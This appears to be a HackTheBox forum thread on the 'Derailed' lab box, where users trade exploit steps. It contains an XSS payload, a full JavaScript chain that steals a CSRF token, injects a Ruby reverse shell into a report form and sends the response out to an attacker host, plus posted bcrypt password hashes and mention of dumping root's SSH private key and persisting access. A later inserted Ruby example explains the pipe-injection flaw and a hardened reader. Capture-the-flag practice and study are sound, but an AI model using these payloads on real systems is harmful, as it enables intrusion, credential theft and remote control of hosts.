Derailed - HTB [Discussion]
[quote="gaoxiaodiao" pid="853343" dateline="1669356604"][quote="onl1_f4ns" pid="852566" dateline="1669333450"]Anybody got a working XSS? I want to play with the intended part now. Don't see a callback yet. Tried this:
[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaW[/code]
[hr]
OK. This simple payload works in clipnotes:
[code]aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%3Csvg%3E%3Canimate%20onend=alert(document.domain)%20attributeName=x%20dur=1s%3Eaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[/code]
Thinking how to point this back to the attacker machine... nothing yet.[/quote]
[code]
// Pull the text between two markers; the right marker is searched for
// after the left one so an earlier occurrence cannot truncate the result.
function getMiddleText(content, leftStr, rightStr) {
  var startIndex = content.indexOf(leftStr) + leftStr.length;
  var endIndex = content.indexOf(rightStr, startIndex);
  return content.substr(startIndex, endIndex - startIndex);
}

// 1. Fetch the admin page (runs in the admin's browser, so the session
//    cookie goes along) and scrape the Rails CSRF token from it.
fetch(`http://derailed.htb:3000/administration`)
  .then((rep) => { return rep.text(); })
  .then((content) => {
    let token = getMiddleText(content, `authenticity_token" value="`, `" autocomplete=`);
    // 2. Submit the report form with the token; report_log carries the
    //    command injection (leading "|"), here a Ruby reverse shell.
    fetch("http://derailed.htb:3000/administration/reports", {
      "headers": {
        "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "content-type": "application/x-www-form-urlencoded",
      },
      "referrer": "http://derailed.htb:3000/administration",
      "referrerPolicy": "strict-origin-when-cross-origin",
      "body": `authenticity_token=${token}&report_log=|ruby+-rsocket+-e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("",4444))'`,
      "method": "POST",
      "mode": "cors",
    })
      .then((rep) => { return rep.text(); })
      // 3. Exfiltrate the response body, base64-encoded, to the attacker host.
      .then((text) => { fetch("http:///data/" + btoa(text)); });
  });
[/code]
Save the long script as a clipnote; the username can be created like below:
[code]uOwn3LyfqH284ap_StS0bIcqAl3v7qMM0SZAxiwBrP9oHDBS[/code]
Then you can get the shell.[/quote]Thanks bro.
This part was missing for the intended stuff. I need to read some advanced stuff on JavaScript and JS hackery for real geeks.
Reply
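The leading `|` in the `report_log=|ruby ...` body above only does anything because of a Ruby-specific behaviour: `Kernel#open` (and, historically, `IO.read` and friends) treat a path that starts with `|` as a command to spawn, returning a pipe to it, while `File.open` has no such convention. The block below is an added example, not code from the Derailed box or its Rails application: a hypothetical vulnerable log reader of the shape such a payload needs, beside a hardened one. The function names, the temp directory layout and the `echo` command are assumptions made for the demonstration.

```ruby
# Added example (not code from the Derailed box or its Rails app): why a
# report name beginning with "|" can turn a file read into command
# execution in Ruby, and how a hardened reader avoids it.
#
# Kernel#open treats "|cmd" as "spawn cmd and hand back a pipe to it".
# File.open has no such convention: "|cmd" is just a (missing) file name.
require "tmpdir"

# Hypothetical vulnerable reader: the shape of server-side code the posted
# `report_log=|ruby ...` payload relies on.
def read_log_vulnerable(path)
  open(path) { |io| io.read }          # Kernel#open => pipe semantics
end

# Same read done with File.open: no pipe, so "|cmd" is Errno::ENOENT.
def read_log_file_open(path)
  File.open(path, "r") { |io| io.read }
rescue Errno::ENOENT
  :no_such_file
end

# Hardened reader: allow-list the name, anchor it under a fixed directory,
# and refuse anything that resolves outside that directory.
def read_log_hardened(dir, name)
  unless name.match?(/\A[\w.-]+\z/)          # no "|", spaces, slashes, NULs
    raise ArgumentError, "bad report name: #{name.inspect}"
  end
  base = File.expand_path(dir) + File::SEPARATOR
  full = File.expand_path(File.join(dir, name))
  unless full.start_with?(base)                # blocks "." / ".." tricks
    raise ArgumentError, "path escapes #{dir}: #{name.inspect}"
  end
  File.open(full, "r") { |io| io.read }
end

# Demonstration on constructed input: one real log file in a temp dir,
# then the same "|echo injected" value fed to each reader.
def demo
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, "report.log"), "ok\n")
    injected = "|echo injected"
    {
      vuln_file: read_log_vulnerable(File.join(dir, "report.log")),
      vuln_pipe: read_log_vulnerable(injected),   # the command actually runs
      file_open: read_log_file_open(injected),    # treated as a file name
      hard_file: read_log_hardened(dir, "report.log"),
      hard_pipe: (read_log_hardened(dir, injected) rescue :rejected),
      hard_traversal: (read_log_hardened(dir, "..") rescue :rejected),
    }
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Running the file prints the hash from `demo`: the `Kernel#open` reader returns `"injected\n"` for the pipe value, i.e. it executed `echo`, whereas `File.open` reports a missing file and the hardened reader rejects both the pipe string and `..`. Swapping `open` for `File.open` closes the pipe trick on its own; the allow-list and directory anchor are what stop the same parameter being used for arbitrary file reads instead.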
(November 25, 2022, 09:12 AM)j3i_hero Wrote: Could anyone send Alice's and Toby's hashes in
var/www/rails-app/db/development.sqlite3

Alice $2a$12$hkqXQw6n0CxwBxEW/0obHOb.0/Grwie/4z95W3BhoFqpQRKIAxI7.
Toby $2a$12$AD54WZ4XBxPbNW/5gWUIKu0Hpv9UKN5RML3sDLuIqNqqimqnZYyle
Reply
[quote="gaoxiaodiao" pid="853343" dateline="1669356604"][...] Then you can get the shell.[/quote]Thx man, finally back on the host, and access persisted with my own SSH key.
Reply
[quote="s0jnik" pid="857565" dateline="1669443994"][...] Thx man, finally back on the host, and access persisted with my own SSH key.[/quote]Can you send root's id_rsa plz?
Reply
(November 26, 2022, 07:28 AM)loosie Wrote: Can you send root's id_rsa plz?

🙄  hummmm lol.
Reply
The author of this box is a great hacker himself, and he learnt a lesson: stop publishing id_rsa keys for accounts, at least for Insane and Hard levels. You have to work your way through, thankfully...
Reply
[quote="loosie" pid="857762" dateline="1669447696"][...] Can you send root's id_rsa plz?[/quote]The root id_rsa is one that I deployed myself. That's part of this box's PE: you exploit a piece of software on the box that allows taking an SSH key from the attacker for root. So even if I send you the id_rsa from my box, it will not help you with your instance. But everything needed to root is written here...
Reply
[quote="undeadly" pid="858543" dateline="1669464382"]The author of this box is a great hacker himself, and he learnt a lesson: stop publishing id_rsa keys for accounts, at least for Insane and Hard levels. You have to work your way through, thankfully...[/quote]Yes and no. Yes: after multiple patches were applied, the root's private key was removed. No: from the beginning, we could retrieve the root's private key:
[quote]┌──(user㉿kali)-[~/.msf4/loot]
└─$ cat 20221120220230_default_127.0.0.1_chrome.debugger._239600.txt
-----BEGIN OPENSSH PRIVATE KEY-----
[key material removed]
-----END OPENSSH PRIVATE KEY-----
[/quote]
Reply
Woah, nice bro, thanks.
Reply
Stuck in XSS: I get a callback but not the token to access /administration.
Reply